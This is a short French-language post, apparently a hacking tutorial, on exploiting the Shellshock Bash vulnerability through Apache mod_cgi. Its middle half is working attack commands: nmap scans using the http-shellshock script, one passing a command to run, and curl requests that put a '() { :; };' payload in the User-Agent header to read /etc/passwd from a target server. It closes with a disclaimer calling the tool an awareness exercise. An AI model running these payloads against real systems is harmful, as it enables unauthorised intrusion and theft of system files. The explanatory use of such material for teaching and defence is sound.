
Exploitation de la vulnérabilité « Shellshock ». Exécution de code à distance dans Apache avec mod_cgi
Shellshock est une vulnérabilité d'exécution de commande à distance dans BASH. Ce script exploite la vulnérabilité dans l'environnement web sur Apache ou similaire avec mod_cgi activé. La vulnérabilité réside dans la manipulation des variables d'environnement, qui sont des valeurs nommées dynamiques affectant le comportement des processus sur un ordinateur. Les attaquants peuvent l'exploiter en attachant du code malveillant aux variables d'environnement, qui est exécuté lors de la réception de la variable. Cela permet aux attaquants de compromettre potentiellement le système.
$ nmap 192.168.x.x --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi
$ nmap -sV -p- --script http-shellshock 192.168.x.x
$ nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls 192.168.x.x
sudo curl -H "User-Agent: () { :; }; /bin/cat /etc/passwd" <WEBSERVER-IP>
sudo curl -A "() { :;}; echo Content-Type: text/html; echo; /bin/cat /etc/passwd;" <WEBSERVER-IP>
Je ne suis pas responsable de toute utilisation illégale ou des dommages causés par cet outil. Il a été écrit pour le fun, pas pour le mal, et vise à sensibiliser au hacking et à la cybersécurité.
Bon hacking :)